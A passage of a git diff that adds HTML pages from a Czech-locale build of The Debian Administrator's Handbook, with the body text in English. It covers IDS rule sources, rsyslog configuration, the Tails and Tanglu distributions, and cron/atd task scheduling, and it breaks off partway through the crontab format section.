+              class="command">snort</code> is the historical reference in the IDS ecosystem and <code
+              class="command">suricata</code> is able to reuse rules written for it. Unfortunately that package is missing from <span
+              class="distribution distribution">Debian Jessie</span> and should be retrieved from another Debian release like <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span>.
+			</div><div
+            class="para">
+				Alternatively, <code
+              class="command">oinkmaster</code> (in the package of the same name) can be used to download Snort rulesets from external sources.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Integration with <code
+                        class="command">prelude</code></strong></p></div></div></div><div
+              class="para">
+				Prelude brings centralized monitoring of security information. Its modular architecture includes a server (the <span
+                class="emphasis"><em>manager</em></span> in <span
+                class="pkg pkg">prelude-manager</span>) which gathers alerts generated by <span
+                class="emphasis"><em>sensors</em></span> of various types.
+			</div><div
+              class="para">
+				Suricata can be configured as such a sensor. Other possibilities include <span
+                class="emphasis"><em>prelude-lml</em></span> (<span
+                class="emphasis"><em>Log Monitor Lackey</em></span>) which monitors log files (in a manner similar to <code
+                class="command">logcheck</code>, described in <a
+                class="xref"
+                href="sect.supervision.html#sect.logcheck">14.3.1 – „Monitoring Logs with <code
+                  class="command">logcheck</code>“</a>).
+			</div><a
+              id="id-1.17.6.7.17.4"
+              class="indexterm"></a></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.firewall-packet-filtering.html"><strong>Předcházející</strong>14.2. Firewall or Packet Filtering</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apparmor.html"><strong>Další</strong>14.4. Introduction to AppArmor</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.syslog.html b/tmp/cs-CZ/html/sect.syslog.html
new file mode 100644
index 000000000..aa70f4583
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.syslog.html
@@ -0,0 +1,331 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.5. syslog System Events</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.administration-interfaces.html"
+        title="9.4. Administration Interfaces" /><link
+        rel="next"
+        href="sect.inetd.html"
+        title="9.6. The inetd Super-Server" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.syslog.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.administration-interfaces.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.inetd.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.syslog"></a>9.5. <code
+                  class="command">syslog</code> System Events</h2></div></div></div><a
+          id="id-1.12.8.2"
+          class="indexterm"></a><a
+          id="id-1.12.8.3"
+          class="indexterm"></a><a
+          id="id-1.12.8.4"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.syslog-principe"></a>9.5.1. Principle and Mechanism</h3></div></div></div><div
+            class="para">
+				The <code
+              class="command">rsyslogd</code> daemon is responsible for collecting service messages coming from applications and the kernel, then dispatching them into log files (usually stored in the <code
+              class="filename">/var/log/</code> directory). It obeys the <code
+              class="filename">/etc/rsyslog.conf</code> configuration file.
+			</div><div
+            class="para">
+				Each log message is associated with an application subsystem (called “facility” in the documentation):
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">auth</code> and <code
+                    class="literal">authpriv</code>: for authentication;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">cron</code>: comes from task scheduling services, <code
+                    class="command">cron</code> and <code
+                    class="command">atd</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">daemon</code>: affects a daemon without any special classification (DNS, NTP, etc.);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ftp</code>: concerns the FTP server;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">kern</code>: message coming from the kernel;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">lpr</code>: comes from the printing subsystem;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">mail</code>: comes from the e-mail subsystem;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">news</code>: Usenet subsystem message (especially from an NNTP — Network News Transfer Protocol — server that manages newsgroups);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">syslog</code>: messages from the <code
+                    class="command">syslogd</code> server, itself;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">user</code>: user messages (generic);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">uucp</code>: messages from the UUCP server (Unix to Unix Copy Program, an old protocol notably used to distribute e-mail messages);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">local0</code> to <code
+                    class="literal">local7</code>: reserved for local use.
+					</div></li></ul></div><div
+            class="para">
+				Each message is also associated with a priority level. Here is the list in decreasing order:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">emerg</code>: “Help!” There is an emergency, the system is probably unusable.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">alert</code>: hurry up, any delay can be dangerous, action must be taken immediately;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">crit</code>: conditions are critical;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">err</code>: error;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">warn</code>: warning (potential error);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">notice</code>: conditions are normal, but the message is important;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">info</code>: informative message;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">debug</code>: debugging message.
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.syslog-config"></a>9.5.2. The Configuration File</h3></div></div></div><div
+            class="para">
+				The syntax of the <code
+              class="filename">/etc/rsyslog.conf</code> file is detailed in the <span
+              class="citerefentry"><span
+                class="refentrytitle">rsyslog.conf</span>(5)</span> manual page, but there is also HTML documentation available in the <span
+              class="pkg pkg">rsyslog-doc</span> package (<code
+              class="filename">/usr/share/doc/rsyslog-doc/html/index.html</code>). The overall principle is to write “selector” and “action” pairs. The selector defines all relevant messages, and the actions describes how to deal with them.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.syslog-selector-syntax"></a>9.5.2.1. Syntax of the Selector</h4></div></div></div><div
+              class="para">
+					The selector is a semicolon-separated list of <code
+                class="literal"><em
+                  class="replaceable">subsystem</em>.<em
+                  class="replaceable">priority</em></code> pairs (example: <code
+                class="literal">auth.notice;mail.info</code>). An asterisk may represent all subsystems or all priorities (examples: <code
+                class="literal">*.alert</code> or <code
+                class="literal">mail.*</code>). Several subsystems can be grouped, by separating them with a comma (example: <code
+                class="literal">auth,mail.info</code>). The priority indicated also covers messages of equal or higher priority; thus <code
+                class="literal">auth.alert</code> indicates the <code
+                class="literal">auth</code> subsystem messages of <code
+                class="literal">alert</code> or <code
+                class="literal">emerg</code> priority. Prefixed with an exclamation point (!), it indicates the opposite, in other words the strictly lower priorities; <code
+                class="literal">auth.!notice</code>, thus, indicates messages issued from <code
+                class="literal">auth</code>, with <code
+                class="literal">info</code> or <code
+                class="literal">debug</code> priority. Prefixed with an equal sign (=), it corresponds to precisely and only the priority indicated (<code
+                class="literal">auth.=notice</code> only concerns messages from <code
+                class="literal">auth</code> with <code
+                class="literal">notice</code> priority).
+				</div><div
+              class="para">
+					Each element in the list on the selector overrides previous elements. It is thus possible to restrict a set or to exclude certain elements from it. For example, <code
+                class="literal">kern.info;kern.!err</code> means messages from the kernel with priority between <code
+                class="literal">info</code> and <code
+                class="literal">warn</code>. The <code
+                class="literal">none</code> priority indicates the empty set (no priorities), and may serve to exclude a subsystem from a set of messages. Thus, <code
+                class="literal">*.crit;kern.none</code> indicates all the messages of priority equal to or higher than <code
+                class="literal">crit</code> not coming from the kernel.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.syslog-action-syntax"></a>9.5.2.2. Syntax of Actions</h4></div></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> The named pipe, a persistent pipe</strong></p></div></div></div><a
+                id="id-1.12.8.6.4.2.2"
+                class="indexterm"></a><a
+                id="id-1.12.8.6.4.2.3"
+                class="indexterm"></a><div
+                class="para">
+					A named pipe is a particular type of file that operates like a traditional pipe (the pipe that you make with the “|” symbol on the command line), but via a file. This mechanism has the advantage of being able to relate two unrelated processes. Anything written to a named pipe blocks the process that writes until another process attempts to read the data written. This second process reads the data written by the first, which can then resume execution.
+				</div><div
+                class="para">
+					Such a file is created with the <code
+                  class="command">mkfifo</code> command.
+				</div></div><div
+              class="para">
+					The various possible actions are:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							add the message to a file (example: <code
+                      class="filename">/var/log/messages</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to a remote <code
+                      class="command">syslog</code> server (example: <code
+                      class="literal">@log.falcot.com</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to an existing named pipe (example: <code
+                      class="literal">|/dev/xconsole</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to one or more users, if they are logged in (example: <code
+                      class="literal">root,rhertzog</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to all logged in users (example: <code
+                      class="literal">*</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							write the message in a text console (example: <code
+                      class="literal">/dev/tty8</code>).
+						</div></li></ul></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Forwarding logs</strong></p></div></div></div><a
+                id="id-1.12.8.6.4.5.2"
+                class="indexterm"></a><div
+                class="para">
+					It is a good idea to record the most important logs on a separate machine (perhaps dedicated for this purpose), since this will prevent any possible intruder from removing traces of their intrusion (unless, of course, they also compromise this other server). Furthermore, in the event of a major problem (such as a kernel crash), you have the logs available on another machine, which increases your chances of determining the sequence of events that caused the crash.
+				</div><div
+                class="para">
+					To accept log messages sent by other machines, you must reconfigure <span
+                  class="emphasis"><em>rsyslog</em></span>: in practice, it is sufficient to activate the ready-for-use entries in <code
+                  class="filename">/etc/rsyslog.conf</code> (<code
+                  class="literal">$ModLoad imudp</code> and <code
+                  class="literal">$UDPServerRun 514</code>).
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.administration-interfaces.html"><strong>Předcházející</strong>9.4. Administration Interfaces</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.inetd.html"><strong>Další</strong>9.6. The inetd Super-Server</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.tails.html b/tmp/cs-CZ/html/sect.tails.html
new file mode 100644
index 000000000..4b9be7b8f
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.tails.html
@@ -0,0 +1,87 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.7. Tails</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.grml.html"
+        title="A.6. Grml" /><link
+        rel="next"
+        href="sect.kali.html"
+        title="A.8. Kali Linux" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.tails.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.grml.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kali.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.tails"></a>A.7. Tails</h2></div></div></div><a
+          id="id-1.20.10.2"
+          class="indexterm"></a><div
+          class="para">
+			Tails (The Amnesic Incognito Live System) aims at providing a live system that preserves anonymity and privacy. It takes great care in not leaving any trace on the computer it runs on, and uses the Tor network to connect to the Internet in the most anonymous way possible. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://tails.boum.org">https://tails.boum.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.grml.html"><strong>Předcházející</strong>A.6. Grml</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kali.html"><strong>Další</strong>A.8. Kali Linux</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.tanglu.html b/tmp/cs-CZ/html/sect.tanglu.html
new file mode 100644
index 000000000..40fb14d78
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.tanglu.html
@@ -0,0 +1,89 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.10. Tanglu</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.devuan.html"
+        title="A.9. Devuan" /><link
+        rel="next"
+        href="sect.doudoulinux.html"
+        title="A.11. DoudouLinux" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.tanglu.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.devuan.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.doudoulinux.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.tanglu"></a>A.10. Tanglu</h2></div></div></div><a
+          id="id-1.20.13.2"
+          class="indexterm"></a><div
+          class="para">
+			Tanglu is another Debian derivative; this one is based on a mix of Debian <span
+            class="distribution distribution">Testing</span> and <span
+            class="distribution distribution">Unstable</span>, with patches to some packages. Its goal is to provide a modern desktop-friendly distribution based on fresh software, without the release constraints of Debian. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://tanglu.org">http://tanglu.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.devuan.html"><strong>Předcházející</strong>A.9. Devuan</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.doudoulinux.html"><strong>Další</strong>A.11. DoudouLinux</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html b/tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html
new file mode 100644
index 000000000..2d2deab2f
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html
@@ -0,0 +1,395 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.7. Scheduling Tasks with cron and atd</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.inetd.html"
+        title="9.6. The inetd Super-Server" /><link
+        rel="next"
+        href="sect.asynchronous-task-scheduling-anacron.html"
+        title="9.8. Scheduling Asynchronous Tasks: anacron" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.task-scheduling-cron-atd.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.inetd.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.task-scheduling-cron-atd"></a>9.7. Scheduling Tasks with <code
+                  class="command">cron</code> and <code
+                  class="command">atd</code></h2></div></div></div><a
+          id="id-1.12.10.2"
+          class="indexterm"></a><a
+          id="id-1.12.10.3"
+          class="indexterm"></a><a
+          id="id-1.12.10.4"
+          class="indexterm"></a><a
+          id="id-1.12.10.5"
+          class="indexterm"></a><div
+          class="para">
+			<code
+            class="command">cron</code> is the daemon responsible for executing scheduled and recurring commands (every day, every week, etc.); <code
+            class="command">atd</code> is that which deals with commands to be executed a single time, but at a specific moment in the future.
+		</div><div
+          class="para">
+			In a Unix system, many tasks are scheduled for regular execution:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					rotating the logs;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					updating the database for the <code
+                  class="command">locate</code> program;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					back-ups;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					maintenance scripts (such as cleaning out temporary files).
+				</div></li></ul></div><div
+          class="para">
+			By default, all users can schedule the execution of tasks. Each user has thus their own <span
+            class="emphasis"><em>crontab</em></span> in which they can record scheduled commands. It can be edited by running <code
+            class="command">crontab -e</code> (its content is stored in the <code
+            class="filename">/var/spool/cron/crontabs/<em
+              class="replaceable">user</em></code> file).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> Restricting <code
+                      class="command">cron</code> or <code
+                      class="command">atd</code></strong></p></div></div></div><div
+            class="para">
+			You can restrict access to <code
+              class="command">cron</code> by creating an explicit authorization file (whitelist) in <code
+              class="filename">/etc/cron.allow</code>, in which you indicate the only users authorized to schedule commands. All others will automatically be deprived of this feature. Conversely, to only block one or two troublemakers, you could write their username in the explicit prohibition file (blacklist), <code
+              class="filename">/etc/cron.deny</code>. This same feature is available for <code
+              class="command">atd</code>, with the <code
+              class="filename">/etc/at.allow</code> and <code
+              class="filename">/etc/at.deny</code> files.
+		</div></div><div
+          class="para">
+			The root user has their own <span
+            class="emphasis"><em>crontab</em></span>, but can also use the <code
+            class="filename">/etc/crontab</code> file, or write additional <span
+            class="emphasis"><em>crontab</em></span> files in the <code
+            class="filename">/etc/cron.d</code> directory. These last two solutions have the advantage of being able to specify the user identity to use when executing the command.
+		</div><div
+          class="para">
+			The <span
+            class="emphasis"><em>cron</em></span> package includes by default some scheduled commands that execute:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					programs in the <code
+                  class="filename">/etc/cron.hourly/</code> directory once per hour;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					programs in <code
+                  class="filename">/etc/cron.daily/</code> once per day;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					programs in <code
+                  class="filename">/etc/cron.weekly/</code> once per week;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					programs in <code
+                  class="filename">/etc/cron.monthly/</code> once per month.
+				</div></li></ul></div><div
+          class="para">
+			Many Debian packages rely on this service: by putting maintenance scripts in these directories, they ensure optimal operation of their services.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.format-crontab"></a>9.7.1. Format of a <code
+                    class="filename">crontab</code> File</h3></div></div></div><a
+            id="id-1.12.10.15.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Text shortcuts for <code
+                        class="command">cron</code></strong></p></div></div></div><div
+              class="para">
+				<code
+                class="command">cron</code> recognizes some abbreviations which replace the first five fields in a <code
+                class="filename">crontab</code> entry. They correspond to the most classic scheduling options:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@yearly</code>: once per year (January 1, at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@monthly</code>: once per month (the 1st of the month, at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@weekly</code>: once per week (Sunday at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@daily</code>: once per day (at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@hourly</code>: once per hour (at the beginning of each hour).
+					</div></li></ul></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SPECIAL CASE</em></span> <code
+                        class="command">cron</code> and daylight savings time</strong></p></div></div></div><div
+              class="para">
+				In Debian, <code
+                class="command">cron</code> takes the time change (for Daylight Savings Time, or in fact for any significant change in the local time) into account as best as it can. Thus, the commands that should have been executed during an hour that never existed (for example, tasks scheduled at 2:30 am during the Spring time change in France, since at 2:00 am the clock jumps directly to 3:00 am) are executed shortly after the time change (thus around 3:00 am DST). On the other hand, in autumn, when commands would be executed several times (2:30 am DST, then an hour later at 2:30 am standard time, since at 3:00 am DST the clock turns back to 2:00 am) are only executed once.
+			</div><div
+              class="para">
+				Be careful, however, if the order in which the different scheduled tasks and the delay between their respective executions matters, you should check the compatibility of these constraints with <code
+                class="command">cron</code>'s behavior; if necessary, you can prepare a special schedule for the two problematic nights per year.
+			</div></div><div
+            class="para">
+				Each significant line of a <span
+              class="emphasis"><em>crontab</em></span> describes a scheduled command with the six (or seven) following fields:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						the value for the minute (number from 0 to 59);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the hour (from 0 to 23);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the day of the month (from 1 to 31);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the month (from 1 to 12);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the day of the week (from 0 to 7, 1 corresponding to Monday, Sunday being represented by both 0 and 7; it is also possible to use the first three letters of the name of the day of the week in English, such as <code
+                    class="literal">Sun</code>, <code
+                    class="literal">Mon</code>, etc.);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the user name under whose identity the command must be executed (in the <code
+                    class="filename">/etc/crontab</code> file and in the fragments located in <code
+                    class="filename">/etc/cron.d/</code>, but not in the users' own crontab files);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the command to execute (when the conditions defined by the first five columns are met).
